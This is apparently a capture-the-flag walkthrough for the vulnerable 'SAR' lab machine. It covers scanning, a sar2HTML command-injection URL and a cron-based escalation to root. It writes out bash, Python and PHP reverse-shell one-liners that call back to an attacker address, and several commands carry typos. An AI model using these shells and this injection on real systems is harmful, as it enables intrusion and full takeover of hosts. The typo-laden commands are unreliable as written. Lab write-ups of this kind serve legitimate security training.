靶机 - SAR

WP

nmap

1. Check the local IP information using the ipconfigcommand. It can be observed that the virtual machine’s IP is 192.168.233.1, Therefore, we can confirm that the target machine’s IP belongs to the 192.168.233.0/24 network segment.
2. Employ nmap to perform a scan of live hosts within this network segment. nmap -un 192.168.233.0/24
   The target IP: 192.168.233.130.
3. Perform a deeper scan of the host’s open ports. namp 192.168.233.130
   It’s found that only port 80 has an open service.

Identify vulnerabilities

1. Access the HTTP service. There is the Apache2 Ubuntu Default Page.
2. Employ dirsearch to perform directory scanning. ‘robots.txt’ is discovered to exist.
3. Access it, reveals the directory name “sar2HTML”.
4. Access it, reveals the sar2html Ver 3.2.1 page.
5. Through online searching, it is found that there is a known vulnerability, like http://target-ip/sar2HTML/index.php?plot=;[injected system commands].
6. Therefore, it can be exploited to execute a reverse shell.

Rebound shell

1. base -c 'bash -i >& /dev/tcp/[IP]/5566 0>&1'
   No connection is received.

Tree ways to execute a reverse shell:
base
base -c 'bash -i >& /dev/tcp/[IP]/5566 0>&1'
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ip]",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
PHP
php -r ‘$sock=fsockopen(“[IP]”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’

2. Try to use python, but still failed. The reason lies in the fact that the target machine has Python3 installed.
   python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ip]",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
3. Successfully obtained the shell. But no root privileges.

Privilege escalation

1. Search for privileges escalation vulnerabilities in the file system.

ls -la /var/www/html
total 40
drwxr-xr-x 3 www-data www-data 4096 Oct 21 2019 .
drwxr-xr-x 4 www-data www-data 4096 Oct 21 2019 …
-rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
-rw-r–r-- 1 www-data www-data 10918 Oct 20 2019 index.html
-rw-r–r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
-rw-r–r-- 1 root root 9 Oct 21 2019 robots.txt
drwxr-xr-x 4 www-data www-data 4096 Oct 20 2019 sar2HTML

-rwxrwxrwx 1 www-data www-data 233 Aug 22 12:17 write.sh
cat finally.sh
#!/bin/sh
./write.sh

cat write.sh
#!/bin/sh
touch /tmp/gateway

2. They two’s function is to create a file, and they have root privileges. Besides, we have privileges to change their founction. Obviously, it’s the vulnerability prepared for us.
   3.So the next step is to find out who execute it.

1. Definition of Cron Jobs: A mechanism in Linux for automating the execution of commands or scripts at predefined time intervals.
2. /etc/crontab: A system-wide cron configuration file visible to all users (typically with 644 permissions, -rw-r--r--) but modifiable only by root. Its format is: Minute Hour Day Month Weekday User Command, where each field specifies the schedule, executing user, and target command/script.
3. Example: A task running daily at 3 AM as root to rotate logs:
   0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf

3. In /etc/crontab we can find that finally.sh will be executed every five minutes. So we just need to write the rebound shell commands into it. Then wait for connection.

Conclusion

Firstly, use nmap to collect information related to IP addresses and ports. After revealing the http page, use dirsearch to find hidden clue. Thirdly, facing a classic web page, search the Internet to see if there are any known vulnerabilities in it. Forthly, obtained a conmand execution vulnerability and directly rebound shell. Finally, search the file system to find vulnerabilities for privilege escalation(root+execution+changable).